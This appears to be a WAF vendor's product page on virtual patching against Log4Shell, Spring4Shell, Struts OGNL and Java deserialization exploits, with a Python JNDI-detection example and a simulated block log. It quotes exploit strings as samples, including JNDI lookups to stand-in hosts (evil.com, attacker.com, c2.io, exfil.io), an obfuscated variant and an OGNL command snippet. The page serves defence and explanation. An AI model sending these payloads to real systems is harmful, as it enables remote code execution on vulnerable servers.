
Block Log4Shell & CVE Exploits — Instant Virtual Patching

Log4Shell (CVE-2021-44228) scored a perfect 10.0 CVSS and compromised millions of servers. PowerWAF blocks JNDI injection, Spring4Shell, Apache Struts exploits, and known CVEs at the edge — before they reach your application.

Limited free plan spots available

OWASP A06:2021

When Known Vulnerabilities Become Active Exploits

Log4Shell shook the internet in December 2021. A single JNDI lookup string — ${jndi:ldap://attacker.com/exploit} — injected into any logged input could give an attacker full remote code execution. The vulnerability existed in Apache Log4j 2, embedded in millions of Java applications, from enterprise platforms to Minecraft servers. Exploitation began within hours of disclosure, and attackers are still scanning for unpatched systems today.

10.0 CVSS score — the maximum severity rating, assigned to Log4Shell (CVE-2021-44228)

But Log4Shell is just one example. Spring4Shell (CVE-2022-22965), Apache Struts RCE (CVE-2017-5638), and Java deserialization exploits follow the same pattern: a disclosed vulnerability, a public exploit, and a race between attackers and defenders. Virtual patching at the WAF level stops the exploit immediately — buying you time to patch properly.

How Attackers Exploit Known CVEs

These are the most dangerous CVE exploitation techniques targeting web applications today.


Log4Shell JNDI Injection

Injecting ${jndi:ldap://} into any logged field — headers, parameters, user agents — to trigger remote code execution via Log4j.

${jndi:ldap://evil.com/exploit}

Spring4Shell RCE

Exploiting Spring Framework's data binding to manipulate the classLoader and write a web shell to the server via crafted HTTP parameters.

class.module.classLoader.URLs

Apache Struts Exploits

Targeting Struts OGNL expression injection (CVE-2017-5638) through manipulated Content-Type headers to achieve remote code execution.

%{(#cmd='id').execute()}

Deserialization CVEs

Sending crafted serialized objects to Java endpoints (Commons Collections, Jackson, Fastjson) that execute arbitrary code upon deserialization.

rO0ABXNy... [malicious gadget chain]

Library Zero-Days

Exploiting newly disclosed vulnerabilities in popular libraries before vendors release patches — targeting the window between disclosure and remediation.

CVE-202X-XXXXX → exploit within hours

How PowerWAF Stops CVE Exploits

Five protection layers that shield your applications from known and emerging vulnerabilities.


JNDI Pattern Blocking

Deep inspection of every request field for JNDI lookup patterns — including obfuscated variants like ${${lower:j}ndi:}, nested lookups, and URL-encoded payloads.

Stops Log4Shell and JNDI-based RCE

CVE Virtual Patching

Pre-built rules for critical CVEs deployed automatically. Blocks exploitation of Spring4Shell, Struts OGNL injection, and hundreds of known vulnerabilities without code changes.

Stops known CVE exploits instantly

Payload Deobfuscation

Decodes URL encoding, Unicode escapes, Base64, nested expressions, and multi-layer obfuscation before analysis — catching evasion techniques that bypass simple pattern matching.

Stops obfuscated and encoded exploits

Threat Intelligence Feed

Continuously updated rules from CVE databases, exploit-db, and active threat monitoring. New virtual patches are pushed to all instances within hours of critical disclosures.

Stops emerging and zero-day CVEs

Serialization Guard

Inspects serialized payloads for known gadget chains, dangerous class instantiations, and suspicious object patterns — blocking Java deserialization attacks at the edge.

Stops deserialization-based RCE
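
The normalize-then-match idea behind the JNDI Pattern Blocking and Payload Deobfuscation layers, as an added Python example that is not PowerWAF's code or rule set. The function names, the `MAX_ROUNDS` bound and the choice to treat `${name:-default}` as always yielding its default are assumptions; it covers URL encoding and nested `lower`/`upper`/default lookups only.

```python
import re
from urllib.parse import unquote

# Innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)
MAX_ROUNDS = 8  # assumed bound on encoding layers and lookup nesting

def _resolve(match):
    """Rewrite lookups that only transform text; leave all others as they are."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return match.group(0)              # keep intact so the final check sees it
    if sep and prefix in ("lower", "upper"):
        return getattr(rest, prefix)()     # ${lower:J} -> "j", ${upper:j} -> "J"
    if ":-" in body:                       # ${name:-default}: assume the default wins
        return body.split(":-", 1)[1]
    return match.group(0)                  # env, sys, date...: not resolvable here

def normalize(value):
    """Undo layered URL encoding, then collapse nested lookups inside-out."""
    for step in (unquote, lambda s: _INNER.sub(_resolve, s)):
        for _ in range(MAX_ROUNDS):
            new = step(value)
            if new == value:
                break
            value = new
        else:
            raise ValueError("still changing after MAX_ROUNDS passes")
    return value

def is_jndi_lookup(value):
    """True if the field normalizes to a JNDI lookup; fail closed on deep nesting."""
    try:
        return bool(_JNDI.search(normalize(value)))
    except ValueError:
        return True

# Constructed request field values; the payload strings are the ones quoted on this page.
SAMPLES = [
    "${jndi:ldap://evil.com/x}",
    "${${lower:j}${::-n}di:rmi://c2.io/a}",
    "%24%7Bjndi%3Adns%3A%2F%2Fexfil.io%2Fleak%7D",
    "price ${total} in USD",
]
if __name__ == "__main__":
    for v in SAMPLES:
        print("BLOCK" if is_jndi_lookup(v) else "ALLOW", v)
```
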

Protected in Minutes, Not Months

No code changes. No emergency patch cycles. No downtime.

1. Point DNS

Route traffic through PowerWAF by updating your DNS records. No server changes needed.

2. Instant CVE Protection

PowerWAF immediately blocks Log4Shell, Spring4Shell, and all known CVE exploits in real time.

3. Patch on Your Schedule

Virtual patching buys you time. Plan and test vendor patches properly while your app stays protected.

Critical for Java applications, Spring-based services, and any system running vulnerable libraries that can't be patched immediately.

See PowerWAF in Action

Real-time view of CVE exploit attempts being detected and blocked at the edge — before they reach your application.

powerwaf-access-log — live
09:41:02 BLOCKED 198.51.100.87 GET /api/search → Log4Shell: ${jndi:ldap://evil.com/x} in User-Agent
09:41:03 BLOCKED 198.51.100.23 POST /login → Log4Shell: ${${lower:j}${::-n}di:rmi://c2.io/a} in username
09:41:04 ALLOWED 203.0.113.50 GET /dashboard → Authenticated user session
09:41:05 BLOCKED 203.0.113.42 POST /spring-app/user → Spring4Shell: class.module.classLoader.URLs[0]
09:41:06 BLOCKED 198.51.100.87 POST /struts2-showcase/ → Struts OGNL: %{(#cmd='whoami')} in Content-Type
09:41:07 ALLOWED 198.51.100.12 POST /api/orders → Valid API request
09:41:08 BLOCKED 198.51.100.23 POST /api/data → Java deserialization: gadget chain in request body
09:41:09 ALLOWED 203.0.113.50 GET /reports → Legitimate report request
09:41:10 BLOCKED 203.0.113.42 GET /app/search?q=${jndi:dns://exfil.io/leak} → Log4Shell DNS exfil attempt
09:41:11 BLOCKED 198.51.100.87 POST /api/import → Fastjson RCE: autoType bypass in JSON body

Simulated log showing how PowerWAF blocks CVE exploitation attempts while allowing legitimate traffic through.

Proven Protection at Scale

< 24h Virtual patch deployment for critical CVEs after disclosure
500+ CVE-specific rules actively maintained and updated
0 Code changes required to protect against new CVEs

Real-World Scenarios

Log4Shell Zero-Day Response

When Log4Shell was disclosed, organizations scrambled to identify every Log4j instance across their infrastructure. PowerWAF customers were protected within hours — JNDI injection patterns were blocked at the edge while teams mapped their exposure and planned remediation.

Spring Framework Upgrade Blocked by Dependencies

A Spring Boot application can't upgrade to a patched version because critical dependencies haven't been updated yet. PowerWAF's virtual patch blocks Spring4Shell exploitation attempts while the development team waits for compatible library releases.

Enterprise Java Platform with Complex Patch Cycles

Large enterprises running Java EE application servers need weeks or months to test and deploy patches. PowerWAF provides immediate protection against known CVEs, letting security teams enforce patching SLAs without leaving the application exposed.

Protects applications built with

Java / Spring
Apache Struts
Apache Tomcat
JBoss / WildFly
Node.js
PHP / Laravel
WordPress
Drupal
Python / Django
Custom Apps

Frequently Asked Questions

What is Log4Shell (CVE-2021-44228)?

Log4Shell is a critical remote code execution (RCE) vulnerability in Apache Log4j 2, a widely used Java logging library. Attackers exploit it by injecting JNDI lookup strings like ${jndi:ldap://attacker.com/payload} into any logged input — HTTP headers, form fields, user agents, or URL parameters. When Log4j processes the string, it fetches and executes remote code, giving the attacker full control of the server. It received the maximum CVSS score of 10.0 and affected millions of applications worldwide.

How does PowerWAF block Log4Shell attacks?

PowerWAF blocks Log4Shell by inspecting every HTTP request — headers, parameters, body, cookies, and user agent — for JNDI injection patterns. This includes plain ${jndi:ldap://}, obfuscated variants like ${${lower:j}ndi:}, nested lookups, URL-encoded payloads, and Unicode escape sequences. PowerWAF strips or blocks these payloads at the edge before they ever reach your Log4j instance, providing immediate protection without patching.

Can PowerWAF protect against Spring4Shell (CVE-2022-22965)?

Yes. PowerWAF includes specific rules for Spring4Shell that block the classLoader manipulation patterns used in this exploit. It detects and blocks requests containing class.module.classLoader payloads, parameter binding attacks targeting Spring MVC, and related RCE attempts — shielding your Spring applications without requiring framework upgrades.

Do I need to patch my servers if I use PowerWAF?

PowerWAF provides immediate protection through virtual patching, but we always recommend applying vendor patches when available. Virtual patching buys you critical time — blocking exploits at the edge while you plan and execute your patching cycle. This is especially valuable for complex environments where patching requires testing, downtime windows, or coordinating across multiple teams.

How quickly does PowerWAF add rules for new CVEs?

PowerWAF's threat intelligence team monitors CVE disclosures, exploit databases, and active campaigns continuously. For critical vulnerabilities like Log4Shell, virtual patch rules are deployed within hours of disclosure — often before vendor patches are available. Rules are pushed automatically to all PowerWAF instances, so you're protected without any manual intervention.

What CVEs does PowerWAF protect against?

PowerWAF maintains an actively updated rule set covering critical CVEs across major frameworks and libraries: Log4Shell (CVE-2021-44228), Spring4Shell (CVE-2022-22965), Apache Struts vulnerabilities (CVE-2017-5638, CVE-2018-11776), Java deserialization exploits, known CMS vulnerabilities in WordPress, Drupal, and Joomla, and emerging zero-day exploits. The rule set is continuously expanded as new threats are disclosed.

Block CVE Exploits Before They Hit Your Server

No credit card required. No code changes. Virtual patching active in under 5 minutes.
